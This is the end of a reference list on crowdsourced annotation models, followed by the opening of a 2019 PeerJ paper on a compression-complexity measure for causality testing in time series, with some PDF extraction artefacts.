gains matter: A case for preferring generative over discrimi- native crowdsourcing models. In Proceedings of the 2015 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies. Paul Felt, Robbie Haertel, Eric K. Ringger, and Kevin D. Seppi. 2014. MOMRESP: A Bayesian model for multi-annotator document labeling. In Proceedings of the International Conference on Language Resources and Eval- uation (LREC 2014), Reykjavik. Paul Felt, Eric K. Ringger, Jordan Boyd-Graber, and Kevin Seppi. 2015b. Making the most of crowdsourced document annotations: Confused supervised LDA. In Proceedings of the Nine- teenth Conference on Computational Natural Language Learning, pages 194–203. Andrew Gelman, John B. Carlin, Hal S. Stern, David B. Dunson, Aki Vehtari, and Donald B. Rubin. 2013. Bayesian Data Analysis, Third Edition. Chapman & Hall/CRC Texts in Sta- tistical Science. Taylor & Francis. Andrew Gelman and Jennifer Hill. 2007. Data Analysis Using Regression and Multi- level/Hierarchical Models. Analytical Methods for Social Research. Cambridge University Press. Andrew Gelman and Donald B. Rubin. 1992. In- ference from iterative simulation using multiple sequences. Statistical science, 7:457–472. Tilmann Gneiting, Fadoua Balabdaoui, and Adrian E. Raftery. 2007. Probabilistic fore- casts, calibration and sharpness. Journal of the Royal Statistical Society: Series B (Statistical Methodology), 69(2):243–268. Ivan Habernal and Iryna Gurevych. 2016. What makes a convincing argument? Empirical anal- ysis and detecting attributes of convincingness in Web argumentation. In Proceedings of the 2016 Conference on Empirical Methods in Nat- ural Language Processing, pages 1214–1223. Dirk Hovy, Taylor Berg-Kirkpatrick, Ashish Vaswani, and Eduard Hovy. 2013. Learning whom to trust with MACE. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 1120–1130. Ece Kamar, Ashish Kapoor, and Eric Horvitz. 2015. Identifying and accounting for task- dependent bias in crowdsourcing. In Third AAAI Conference on Human Computation and Crowdsourcing. Hyun-Chul Kim and Zoubin Ghahramani. 2012. Bayesian classifier combination. In Proceed- ings of the Fifteenth International Confer- ence on Artificial Intelligence and Statistics, pages 619–627, La Palma, Canary Islands. John Lalor, Hao Wu, and hong yu. 2016. Build- ing an evaluation scale using item response the- ory. In Proceedings of the 2016 Conference on Empirical Methods in Natural Language Pro- cessing, pages 648–657. Association for Com- putational Linguistics. John P. Lalor, Hao Wu, and Hong Yu. 2017. Improving machine learning ability with fine- tuning. CoRR, abs/1702.08563. Version 1. Matthew Lease and Gabriella Kazai. 2011. Overview of the TREC 2011 crowdsourcing track. In Proceedings of the text retrieval con- ference (TREC). Fernando Martınez-Plumed, Ricardo B. C. Prudêncio, Adolfo Martınez-Usó, and José Hernández-Orallo. 2016. Making sense of item response theory in machine learning. In Proceedings of 22nd European Conference on Artificial Intelligence (ECAI), Frontiers in Artificial Intelligence and Applications, volume 285, pages 1140–1148. Thiago G. Martins, Daniel Simpson, Finn Lindgren, and Håvard Rue. 2013. Bayesian computing 583 https://books.google.co.uk/books?id=ZXL6AQAAQBAJ https://books.google.co.uk/books?id=ZXL6AQAAQBAJ https://books.google.co.uk/books?id=lV3DIdV0F9AC https://books.google.co.uk/books?id=lV3DIdV0F9AC https://doi.org/10.1214/ss/1177011136 https://doi.org/10.1214/ss/1177011136 https://doi.org/10.1214/ss/1177011136 https://doi.org/10.18653/v1/D16-1062 https://doi.org/10.18653/v1/D16-1062 https://doi.org/10.18653/v1/D16-1062 http://arxiv.org/abs/1702.08563 http://arxiv.org/abs/1702.08563 with INLA: New features. Computational Statistics & Data Analysis, 67:68–83. Pablo G. Moreno, Antonio Artés-Rodríguez, Yee Whye Teh, and Fernando Perez-Cruz. 2015. Bayesian nonparametric crowdsourcing. Jour- nal of Machine Learning Research. Rebecca J. Passonneau and Bob Carpenter. 2014. The benefits of a model of annotation. Transac- tions of the Association for Computational Lin- guistics, 2:311–326. Juho Piironen and Aki Vehtari. 2017. Comparison of Bayesian predictive methods for model selec- tion. Statistics and Computing, 27(3):711–735. Barbara Plank, Dirk Hovy, Ryan McDonald, and Anders Søgaard. 2014a. Adapting taggers to Twitter with not-so-distant supervision. In Proceedings of COLING 2014, the 25th Inter- national Conference on Computational Linguis- tics: Technical Papers, pages 1783–1792. Barbara Plank, Dirk Hovy, and Anders Sogaard. 2014b. Linguistically debatable or just plain wrong? In Proceedings of the 52nd Annual Meeting of the Association for Computational Linguistics (Volume 2: Short Papers). Massimo Poesio and Ron Artstein. 2005. The re- liability of anaphoric annotation, reconsidered: Taking ambiguity into account. In Proceedings of ACL Workshop on Frontiers in Corpus Anno- tation, pages 76–83. Nguyen Quoc Viet Hung, Nguyen Thanh Tam, Lam Ngoc Tran, and Karl Aberer. 2013. An evaluation of aggregation techniques in crowd- sourcing. In Web Information Systems Engi- neering – WISE 2013, pages 1–15, Berlin, Heidelberg. Springer Berlin Heidelberg. Sophia Rabe-Hesketh and Anders Skrondal. 2008. Generalized linear mixed-effects models. Lon- gitudinal data analysis, pages 79–106. Georg Rasch. 1993. Probabilistic Models for Some Intelligence and Attainment Tests. ERIC. Vikas C. Raykar, Shipeng Yu, Linda H. Zhao, Gerardo Hermosillo Valadez, Charles Florin, Luca Bogoni, and Linda Moy. 2010. Learning from crowds. Journal of Machine Learning Re- search, 11:1297–1322. Marta Sabou, Kalina Bontcheva, Leon Derczynski, and Arno Scharl. 2014. Corpus annotation through crowdsourcing: Towards best practice guidelines. In Proceedings of the Ninth Interna- tional Conference on Language Resources and Evaluation (LREC-2014), pages 859–866. Aashish Sheshadri and Matthew Lease. 2013. SQUARE: A benchmark for research on com- puting crowd consensus. In Proceedings of the 1st AAAI Conference on Human Computation (HCOMP), pages 156–164. Edwin Simpson, Stephen Roberts, Ioannis Psorakis, and Arfon Smith. 2013. Dynamic Bayesian Combination of Multiple Imperfect Classifiers. Springer Berlin Heidelberg, Berlin, Heidelberg. Anders Skrondal and Sophia Rabe-Hesketh. 2004. Generalized Latent Variable Modeling: Mul- tilevel, Longitudinal, and Structural Equation Models. Chapman & Hall/CRC Interdisci- plinary Statistics. Taylor & Francis. Mark D. Smucker, James Allan, and Ben Carterette. 2007. A comparison of statisti- cal significance tests for information retrieval evaluation. In Proceedings of the Sixteenth ACM Conference on Conference on Informa- tion and Knowledge Management, CIKM ’07, pages 623–632, New York, NY, USA. ACM. Padhraic Smyth, Usama M. Fayyad, Michael C. Burl, Pietro Perona, and Pierre Baldi. 1995. In- ferring ground truth from subjective labelling of Venus images. In Advances in neural informa- tion processing systems, pages 1085–1092. Rion Snow, Brendan O’Connor, Daniel Jurafsky, and Andrew Y. Ng. 2008. Cheap and fast - but is it good? Evaluating non-expert annotations for natural language tasks. In Proceedings of the Conference on Empirical Methods in Natu- ral Language Processing, pages 254–263. Matthew Stephens. 2000. Dealing with label switching in mixture models. Journal of the Royal Statistical Society: Series B (Statistical Methodology), 62(4):795–809. Chris Van Pelt and Alex Sorokin. 2012. De- signing a scalable crowdsourcing platform. In 584 https://doi.org/10.1007/s11222-016-9649-y https://doi.org/10.1007/s11222-016-9649-y https://doi.org/10.1007/s11222-016-9649-y http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf https://doi.org/10.1007/978-3-642-36406-8_1 https://doi.org/10.1007/978-3-642-36406-8_1 https://doi.org/10.1007/978-3-642-36406-8_1 https://books.google.ro/books?id=JjR6AgAAQBAJ https://books.google.ro/books?id=JjR6AgAAQBAJ https://books.google.ro/books?id=JjR6AgAAQBAJ https://doi.org/10.1145/1321440.1321528 https://doi.org/10.1145/1321440.1321528 https://doi.org/10.1145/1321440.1321528 https://doi.org/10.1111/1467-9868.00265 https://doi.org/10.1111/1467-9868.00265 Proceedings of the 2012 ACM SIGMOD Inter- national Conference on Management of Data, pages 765–766. ACM. Aki Vehtari, Andrew Gelman, and Jonah Gabry. 2017. Practical Bayesian model evaluation us- ing leave-one-out cross-validation and WAIC. Statistics and Computing, 27(5):1413–1432. Jacob Whitehill, Ting-fan Wu, Jacob Bergsma, Javier R. Movellan, and Paul L. Ruvolo. 2009. Whose vote should count more: Optimal in- tegration of labels from labelers of unknown expertise. In Advances in Neural Information Processing Systems 22, pages 2035–2043. Curran Associates, Inc. W. John Wilbur. 1994. Non-parametric signif- icance tests of retrieval performance com- parisons. Journal of Information Science, 20(4):270–284. 585 https://doi.org/10.1007/s11222-016-9696-4 https://doi.org/10.1007/s11222-016-9696-4 http://papers.nips.cc/paper/3644-whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf http://papers.nips.cc/paper/3644-whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf http://papers.nips.cc/paper/3644-whose-vote-should-count-more-optimal-integration-of-labels-from-labelers-of-unknown-expertise.pdf https://doi.org/10.1177/016555159402000405 https://doi.org/10.1177/016555159402000405 https://doi.org/10.1177/016555159402000405 work_4i3v2eiupvdt5gqy5o2tdcvz2e ---- Submitted 6 December 2018 Accepted 29 April 2019 Published 27 May 2019 Corresponding author Aditi Kathpalia, kathpaliaaditi@gmail.com Academic editor Ciro Cattuto Additional Information and Declarations can be found on page 21 DOI 10.7717/peerj-cs.196 Copyright 2019 Kathpalia et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Data-based intervention approach for Complexity-Causality measure Aditi Kathpalia and Nithin Nagaraj Consciousness Studies Programme, National Institute of Advanced Studies, Bengaluru, Karnataka, India ABSTRACT Causality testing methods are being widely used in various disciplines of science. Model-free methods for causality estimation are very useful, as the underlying model generating the data is often unknown. However, existing model-free/data-driven measures assume separability of cause and effect at the level of individual samples of measurements and unlike model-based methods do not perform any intervention to learn causal relationships. These measures can thus only capture causality which is by the associational occurrence of ‘cause’ and ‘effect’ between well separated samples. In real-world processes, often ‘cause’ and ‘effect’ are inherently inseparable or become inseparable in the acquired measurements. We propose a novel measure that uses an adaptive interventional scheme to capture causality which is not merely associational. The scheme is based on characterizing complexities associated with the dynamical evolution of processes on short windows of measurements. The formulated measure, Compression-Complexity Causality is rigorously tested on simulated and real datasets and its performance is compared with that of existing measures such as Granger Causality and Transfer Entropy. The proposed measure is robust to the presence of noise, long-term memory, filtering and decimation, low temporal resolution (including aliasing), non-uniform sampling, finite length signals and presence of common driving variables. Our measure outperforms existing state-of-the-art measures, establishing itself as an effective tool for causality testing in real world applications. Subjects Adaptive and Self-Organizing Systems, Data Science, Scientific Computing and Simulation Keywords Causality, Causal inference, Intervention, Compression-complexity, Model-based, Dynamical complexity, Negative causality INTRODUCTION The ‘Ladder of Causation’ very rightly arranges hierarchically the abilities of a causal learner (Pearl & Mackenzie, 2018). The three levels proposed are: 1. Association, 2. Intervention and 3. Counterfactuals, when arranged from the lower rung to the higher rung. Currently, causality learning and inferring algorithms using only data are still stuck at the lowermost rung of ‘Association’. Measures such as Granger Causality (GC) (Granger, 1969) and its various modifications (Dhamala, Rangarajan & Ding, 2008; Marinazzo, Pellicoro & Stramaglia, 2008), as well as, Transfer Entropy (TE) (Schreiber, 2000) that are widely being used across various disciplines of science—neuroscience (Seth, Barrett & Barnett, 2015; Vicente et al., 2011), climatology (Stips et al., 2016; Mosedale et al., 2006), econometrics (Hiemstra & How to cite this article Kathpalia A, Nagaraj N. 2019. Data-based intervention approach for Complexity-Causality measure. PeerJ Com- put. Sci. 5:e196 http://doi.org/10.7717/peerj-cs.196 https://peerj.com mailto:\unskip \penalty -\@M kathpaliaaditi@gmail.com mailto:\unskip \penalty -\@M kathpaliaaditi@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.196 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.196 Jones, 1994; Chiou-Wei, Chen & Zhu, 2008), engineering (Bauer et al., 2007) etc. are largely ‘model-free’/ ‘data-driven’ measures of causality. They make minimal assumptions about the underlying physical mechanisms and depend more on time series characteristics (Seth, Barrett & Barnett, 2015). Hence, they have a wider scope compared to specific model assumptions made by methods such as Dynamic Causal Modelling (Friston, Harrison & Penny, 2003) and Structural Equation Modeling (Pearl, 2009). However, the assumptions made by these methods are often ignored in practice, resulting in erroneous causality estimates on real world datasets. These measures can accurately quantify the degree of coupling between given time series only if assumptions (such as linearity, stationarity and presence of Gaussian noise in case of GC and stationarity, markovian in case of TE) are satisfied. Thus, these methods, when correctly applied, can infer the presence of causality when it is by ‘association’ alone and not due to higher levels on the Ladder of Causation. To explain this better, consider a case where the ‘cause’ and ‘effect’ are inseparable. This can happen even when the time series satisfies stationarity but is non-markovian or in several instances when it is non-stationary. In fact, the stated assumptions are quite unlikely to be met in practice considering that acquired data are typically samples of continuous/discrete evolution of real world processes. These processes might be evolving at spatio-temporal scales very different from the scales of measurements. As a result, cause and effect may co-exist in a single measurement or overlap over blocks of measurements, making them inseparable. In such a scenario, it would be incorrect to estimate causality by means of correlations and/or joint probabilities which implicitly assumes the separability of ‘cause’ and ‘effect’. Both GC and TE make this assumption of separability. Circularly, to characterize a time series sample as purely a ‘cause’ or an ‘effect’ is possible only if there is a clear linear/markovian separable relationship. When cause and effect are inseparable, ‘associational’ measures of causality such as GC and TE are insufficient and we need a method to climb up the ladder of causation. Intervention based approaches to causality rank higher than association. It involves not just observing regularities in the data but actively changing what is there and then observing its effect. In other words, we are asking the question—what will happen if we ‘do’ something? Given only data and not the power to intervene on the experimental set up, intervention can only be done by building strong, accurate models. Model-based causality testing measures, alluded to before, will fall in this category. They invert the model to obtain its various parameters, and then intervene to make predictions about situations for which data is unavailable. However, these methods are very domain specific and the models require specific knowledge about the data. With insufficient knowledge about the underlying model which generated the data, such methods are inapplicable. Given only data that has already been acquired without any knowledge of its generating model or the power to intervene on the experimental/real-world setting, we can ask the question—what kind of intervention is possible (if at all) to infer causality? The proposed ‘interventional causality’ approach will not merely measure ‘associational causality’ because it does not make the assumption that the cause and its effect are present sample by sample (separable) as is done by existing model-free, data based methods of causality estimation. Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 2/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 Even in cases where cause and its effect are inseparable, which is probably true for most real-world processes, the change in the dynamics of processes would contain information about causal influences between them. With this understanding, we propose the novel idea of data-based, model-free Interventional Complexity Causality (ICC). In this paper, we formalize the notion of ICC using Compression-Complexity to define Compression- Complexity Causality (CCC). CCC shows some interesting properties. We test CCC on simulated and real datasets and compare its performance with existing model-free causality methods. Our results demonstrate that CCC overcomes the limitations of ‘associational’ measures (GC and TE) to a large extent. Other methods for causality estimation based on compression have been proposed in literature (Budhathoki & Vreeken, 2016; Wieczorek & Roth, 2016), but the very philosophy behind our method and its implementation are very different from these existing methods. This paper is organized as follows. The idea of Dynamical Complexity and its specific realization Dynamical Compression-Complexity are discussed in ‘Dynamical Complexity (DC) and Dynamical Compression-Complexity (CC)’. Interventional Complexity Causality and its specific case Compression-Complexity Causality (CCC) are discussed in ‘Interventional Complexity Causality (ICC) and Compression-Complexity Causality (CCC)’. How it is possible to obtain positive and negative values of CCC and what its implications are on the kind of causal influence is detailed in ‘Positive and Negative CCC’. Results and discussion on the performance of CCC and its comparison with existing measures, GC and TE, are included in ‘Results and Discussion’. This is followed by conclusions and future work in ‘Conclusions’. A list of frequently used abbreviations is provided at the end of the paper. DYNAMICAL COMPLEXITY (DC) AND DYNAMICAL COMPRESSION-COMPLEXITY (CC) There can be scenarios where cause and effect co-exist in a single temporal measurement or blocks of measurements. For example, this can happen (a) inherently in the dynamics of the generated process, (b) when cause and effect occur at different spatio-temporal scales, (c) when measurements are acquired at a scale different from the spatio-temporal scale of the cause–effect dynamics (continuous or discrete). In such a case, probabilities of joint occurrence is too simplistic an assumption to capture causal influences. On the other hand, the very existence of causality here is actually resulting in a change of joint probabilities/correlations which cannot be captured by an assumption of static probabilities. To overcome this problem, we capture causality using the idea of dynamical complexity. Inseparable causal influences within a time series (or between two time series) would be reflected in their dynamical evolution. Dynamical Complexity (DC) of a single time series X is defined as below - DC(1X|Xpast )=C(Xpast +1X)−C(Xpast ), (1) where 1X is a moving window of length w samples and Xpast is a window consisting of immediate past L samples of1X. ‘+’ refers to appending, for e.g., for time series A=[1,2,3] Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 3/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 and B=[p,q], then A+B=[1,2,3,p,q].C(X) refers to complexity of time series X.DC, thus varies with the temporal index of 1X and can be averaged over the entire time series to estimate its average DC. It is important to note that dynamical complexity is very different from complexity rate (CR), which can be estimated as follows - CR(1X|Xpast )=C(Xpast,1X)−C(Xpast ), (2) where C(Xpast,1X) is the joint complexity of Xpast and 1X. Complexity rate can be seen as a generalization of Shannon entropy rate (Cover & Thomas, 2012), the difference being that the former can be computed using any notion of complexity, not just entropy. As is evident from Eqs. (1) and (2), CR is estimated based on the joint occurrences of 1X and Xpast , while DC captures temporal change in complexity on the evolution of the process. In case of the inseparability of cause and effect, it would be inappropriate to use CR to infer causal relationships. Now for this notion of ‘‘complexity’’, that has been referred to in this section several times, there is no single unique definition. As noted in Nagaraj & Balasubramanian (2017b), Shannon entropy (Shannon, 1948; Cover & Thomas, 2012) is a very popular and intuitive measure of complexity. A low value of Shannon entropy indicates high redundancy and structure (low complexity) in the data and a high value indicates low redundancy and high randomness (high complexity). For ergodic sources, owing to Shannon’s noiseless source coding theorem (Cover & Thomas, 2012), (lossless) compressibility of the data is directly related to Shannon entropy. However, robustly estimating compressibility using Shannon entropy for short and noisy time series is a challenge (Nagaraj & Balasubramanian, 2017a). Recently, the notion of compression-complexity has been introduced (Nagaraj & Balasubramanian, 2017a) to circumvent this problem. Compression-complexity defines the complexity of a time series by using optimal lossless data compression algorithms. It is well acknowledged that data compression algorithms are not only useful for compression of data for efficient transmission and storage, but also act as models for learning and statistical inference (Cilibrasi, 2007). Lempel–Ziv (LZ) Complexity (Lempel & Ziv, 1976) and Effort-To-Compress (ETC) (Nagaraj, Balasubramanian & Dey, 2013) are two measures which fall in this category. As per the minimum description length principle (Rissanen, 1978), that formalizes the Occam’s razor, the best hypothesis (model and its parameters) for a given set of data is the one that leads to its best compression. Extending this principle for causality, an estimation based on dynamical complexity (compressibility) of time series would be the best possible means to capture causally influenced dynamics. Out of the complexity measures discussed before, ETC seemed to be most suitable for estimation of dynamical complexity. ETC is defined as the effort to compress the input sequence using the lossless compression algorithm known as Non-sequential Recursive Pair Substitution (NSRPS). It has been demonstrated that both LZ and ETC outperform Shannon entropy in accurately characterizing the dynamical complexity of both stochastic (Markov) and deterministic chaotic systems in the presence of noise (Nagaraj & Balasubramanian, 2017a; Nagaraj & Balasubramanian, 2017b). Further, ETC has shown Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 4/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 to reliably capture complexity of very short time series where even LZ fails (Nagaraj & Balasubramanian, 2017a), and for analyzing short RR tachograms from healthy young and old subjects (Balasubramanian & Nagaraj, 2016). Recently, ETC has been used to propose a compression-complexity measure for networks (Virmani & Nagaraj, 2019). In order to faithfully capture the process dynamics, DC is required to be estimated on overlapping short-length windows of time series data. Infotheoretic quantities (like shannon entropy), which are based on the computation of probability densities, are not the ideal choice here (owing to finite-length effects). Compression-Complexity measures are more appropriate choices. Because of the advantages of ETC over LZ mentioned above, we use ETC to formulate our measure of causality discussed in the next section. Before that, we describe how individual and joint compression complexities are computed using ETC (Nagaraj, Balasubramanian & Dey, 2013) in the subsections below. ETC measure for a time series: ETC(X ) Since ETC expects a symbolic sequence as its input (of length >1), the given time series should be binned appropriately to generate such a sequence. Once such a symbolic sequence is available, ETC proceeds by parsing the entire sequence (from left to right) to find that pair of symbols in the sequence which has the highest frequency of occurrence. This pair is replaced with a new symbol to create a new symbolic sequence (of shorter length). This procedure is repeated iteratively and terminates only when we end up with a constant sequence (whose entropy is zero since it consists of only one symbol). Since the length of the output sequence at every iteration decreases, the algorithm will surely halt. The number of iterations needed to convert the input sequence to a constant sequence is defined as the value of ETC complexity. For example, the input sequence ‘12121112’ gets transformed as follows: 12121112 7→33113 7→4113 7→513 7→63 7→7. Thus, ETC(12121112)=5. ETC achieves its minimum value (0) for a constant sequence and maximum value (m−1) for a m length sequence with distinct symbols. Thus, we normalize the ETC complexity value by dividing by m−1. Thus, normalized ETC(12121112)= 57. Note that normalized ETC values are always between 0 and 1 with low values indicating low complexity and high values indicating high complexity. Joint ETC measure for a pair of time series: ETC(X,Y ) We perform a straightforward extension of the above mentioned procedure (ETC(X)) for computing the joint ETC measure ETC(X,Y ) for a pair of input time series X and Y of the same length. At every iteration, the algorithm scans (from left to right) simultaneously X and Y sequences and replaces the most frequent jointly occurring pair with a new symbol for both the pairs. To illustrate it by an example, consider, X =121212 and Y =abacac. The pair (X,Y ) gets transformed as follows: (121212,abacac) 7→(1233,abdd) 7→(433,edd) 7→(53,fd) 7→(6,g). Thus, ETC(X,Y )=4 and normalized value is 45. It can be noted that ETC(X,Y )≤ETC(X)+ETC(Y ). Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 5/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 INTERVENTIONAL COMPLEXITY CAUSALITY (ICC) AND COMPRESSION-COMPLEXITY CAUSALITY (CCC) To measure how the dynamics of a process Y influence the dynamics of a process X, we intervene to create new hypothetical blocks of time series data, Ypast +1X, where Ypast is a window of length L samples, taken from the immediate past of the window 1X. These blocks are created by ‘surgery’ and do not exist in reality in the data that is already collected. Interventional Complexity Causality (ICC) is defined as the change in the dynamical complexity of time series X when 1X is seen to be generated jointly by the dynamical evolution of both Ypast and Xpast as opposed to by the reality of the dynamical evolution of Xpast alone. This formulation is actually in line with Wiener’s idea, according to which, time series Y causes X, if incorporating the past of Y helps to improve the prediction of X (Wiener, 1956). While GC is based on the notion of improved predictability and TE on the reduction of uncertainty, ICC is based on the notion of change in ‘dynamical complexity’ when information from the past of Y is brought in, in order to check its causal influence on X. The difference between existing approaches and the proposed measure is that the effect of Y on X is analyzed based on ‘associational’ means in case of the former and by ‘interventional’ means in case of the latter. With this formulation, ICC is designed to measure effect, like GC and TE, and not the mechanism, as in Dynamic Causal Modelling (Seth, Barrett & Barnett, 2015; Barrett & Barnett, 2013). To elaborate on this aspect, ICC cannot explicitly quantify the interaction coefficients of the underlying generative model (physical mechanism), but will only estimate causal influence based on change in dynamical complexities. It is, however, expected that ICC will be closer to the underlying mechanism than existing methods, because, by its very formulation, it taps on causes and their effects based on dynamical evolution of processes. Mathematically, ICCYpast→1X =DC(1X|Xpast )−DC(1X|Xpast,Ypast ), (3) where DC(1X|Xpast ) is as defined in Eq. (1) and DC(1X|Xpast,Ypast ) is as elaborated below: DC(1X|Xpast,Ypast )=C(Xpast +1X,Ypast +1X)−C(Xpast,Ypast ), (4) where C(·,·) refers to joint complexity. ICC varies with the moving temporal window 1X and its corresponding Ypast , Xpast . To estimate average causality from time series Y to X, ICCYpast→1X obtained for all 1Xs are averaged. The above is the generic description of ICC that can be estimated using any complexity measure. For the reasons discussed in ‘Dynamical Complexity (DC) and Dynamical Compression-Complexity (CC)’, we would like to estimate ICC using the notion of Dynamical Compression-Complexity estimated by the measure ETC. The measure would then become Interventional Compression-Complexity Causality. For succinctness, we refer to it as Compression-Complexity Causality (CCC). To estimate CCC, time series blocks Xpast , Ypast , Xpast+1X, and surgically created Ypast+1X are separately encoded (binned)— converted to a sequence of symbols using ‘B’ uniformly sized bins for the application of Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 6/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196 1Henceforth, the same variables are used to denote the binned/encoded versions of the blocks. ETC.1 For the binned time series blocks, Xpast , Ypast , Xpast +1X, Ypast +1X, to determine whether Ypast caused 1X or not, we first compute dynamical compression-complexities, denoted by CC, CC(1X|Xpast )=ETC(Xpast +1X)−ETC(Xpast ), (5) CC(1X|Xpast,Ypast )=ETC(Xpast +1X,Ypast +1X)−ETC(Xpast,Ypast ), (6) Equation (5) gives the dynamical compression-complexity of 1X as a dynamical evolution of Xpast alone. Equation (6) gives the dynamical compression-complexity for 1X as a dynamical evolution of both Xpast and Ypast . ETC(·) and ETC(·,·) refer to individual and joint effort-to-compress complexities. For estimating ETC from these small blocks of data, short-term stationarity of X and Y is assumed. We now define Compression-Complexity Causality CCCYpast→1X as: CCCYpast→1X =CC(1X|Xpast )−CC(1X|Xpast,Ypast ). (7) Averaged CCC from Y to X over the entire length of time series with the window 1X being slided by a step-size of δ is estimated as— CCCY→X =CCCYpast→1X =CC(1X|Xpast )−CC(1X|Xpast,Ypast ), (8) If CC(1X|Xpast,Ypast )≈CC(1X|Xpast ), then CCCY→X is statistically zero, implying no causal influence from Y to X. If CCCY→X is statistically significantly different from zero, then we infer that Y causes X. A higher magnitude of CCCY→X implies a higher degree of causation from Y to X. The length of Xpast,Ypast , that is L is chosen by determining the correct intervention point. This is the temporal scale at which Y has a dynamical influence on X. Detailed criteria and rationale for estimating L and other parameters used in CCC estimation: w (length of 1X), δ and B for any given pair of time series are discussed in Section S3. CCC is invariant to local/global scaling and addition of constant value to the time series. As CCC is based on binning of small blocks of time series data, it is noise resistant. Furthermore, it is applicable to non-linear and short term stationary time series. Being based on dynamical evolution of patterns in the data, it is expected to be robust to sub-sampling and filtering. For multivariate data, CCC can be estimated in a similar way by building dictionaries that encode information from all variables. Thus, to check conditional causality from Y to X amidst the presence of other variables (say Z and W ), two time varying dictionaries are built—D that encodes information from all variables (X, Y , Z, W ) and D′ that encodes information from all variables except Y (X, Z, W only). Once synchronous time series blocks from each variable are binned, the dictionary at that time point is constructed by obtaining a new sequence of symbols, with each possible combination of symbols from all variables being replaced by a particular symbol. The mechanism for construction of these dictionaries is discussed in Section S1. Subsequently, dynamical compression-complexities are computed as: CC(1X|D′past )=ETC(D ′ past +1X)−ETC(D ′ past ), (9) Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 7/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196#supplemental-information http://dx.doi.org/10.7717/peerj-cs.196 2It should be mentioned that, strictly speaking, KL and JSD are not distance measures since they don’t satisfy the triangle inequality. CC(1X|Dpast )=ETC(Dpast +1X)−ETC(Dpast ), (10) where D′past+1X represents the lossless encoding of joint occurrences of binned time series blocks Xpast +1X, Zpast +1X, Wpast +1X and D′past refers to the lossless encoding of joint occurrences of binned time series blocks Xpast , Zpast and Wpast . Similarly, Dpast +1X represents the lossless encoding of joint occurrences of binned time series blocks Xpast+1X, Ypast +1X,Zpast +1X, Wpast +1X and Dpast refers to the the lossless encoding of joint occurrences of binned time series blocks Xpast , Ypast , Zpast and Wpast . Conditional Compression-Complexity Causality, CCCYpast→1X|Zpast,Wpast , is then estimated as the difference of Eqs. (9) and (10). Averaged Conditional Compression Complexity-Causality over the entire time series with the window 1X being slided by a step-size of δ is given as below: CCCY→X|Z,W =CC(1X|D ′)−CC(1X|D). (11) POSITIVE AND NEGATIVE CCC The dynamical compression-complexities estimated for the purpose of CCC estimation, CC(1X|Xpast ) and CC(1X|Xpast,Ypast ), can be either positive or negative. For instance, consider the case when CC(1X|Xpast ) becomes negative. This happens when ETC(Xpast +1X) is less than ETC(Xpast ), which means that with the appending of 1X, the sequence Xpast has become more structured resulting in reduction of its complexity. The value of CC(1X|Xpast ) is positive when appending of 1X makes Xpast less structured (hence more complex). Similarly, CC(1X|Xpast,Ypast ) can also become negative when ETC realizes Xpast +1X, Ypast +1X to be more structured than Xpast , Ypast . When the opposite is true, CC(1X|Xpast,Ypast ) is positive. Because of the values that CC(1X|Xpast ) and CC(1X|Xpast,Ypast ) can take, CCCYpast→1X can be both positive or negative. How different cases result with different signs of the two quantities along with their implication on CCC is shown in Table S1 of the supplementary material. We see that the sign of CCCYpast→1X signifies the ‘kind of dynamical influence’ that Ypast has on 1X, whether this dynamical influence is similar to or different from that of Xpast on 1X. When CCCYpast→1X is −ve, it signifies that Ypast has a different dynamical influence on 1X than Xpast . On the contrary, when CCCYpast→1X is +ve, it signifies that Ypast has a dynamical influence on 1X that is similar to that of Xpast . On estimating the averaged CCC from time series Y to X, expecting that CCCYpast→1X values do not vary much with time, we can talk about the kind of dynamical influence that time series Y has on X. For weak sense stationary processes, it is intuitive that the influence of Y on X would be very different from that on X due to its own past when the distributions of coupled time series Y and X are very different. We verify this intuition by measuring probability distribution distances2 between coupled processes Y and X using symmetric Kullback–Leibler Divergence (KL) and Jensen–Shannon Divergence (JSD). The trend of values obtained by these divergence Kathpalia et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.196 8/24 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.196#supp-1 http://dx.doi.org/10.7717/peerj-cs.196 measures is compared with the trend of CCC for different cases such as when CCC is positive or negative. Coupled autoregressive (AR) processes were generated as per Eq. (15). Also, linearly coupled tent maps were generated as per Eqs. (17) and (18). Symmetric KL and JSD between distribution P and Q of coupled processes are estimated as per Eqs. (12) and (14) respectively. DSymm KL(P,Q)=DKL(P‖Q)+DKL(Q‖P), (12) where, DKL(P ‖Q)= ∑ i P(i)log ( P(i) Q(i) ) , DKL(Q‖P)= ∑ i Q(i)log ( Q(i) P(i) ) . (13) JSD(P ‖Q)= 1 2 D(P ‖M)+ 1 2 D(Q‖M), (14) where, M = 12(P+Q). KL and JSD values are in unit of nats. Curves for KL, JSD and CCC estimated for increasing coupling between AR processes of order 1 and linearly coupled tent maps are shown in Figs. 1 and 2 respectively. Results for non-linear coupling of tent maps are similar to that for linear coupling and are included (Fig. S10, Section S4.1). The values 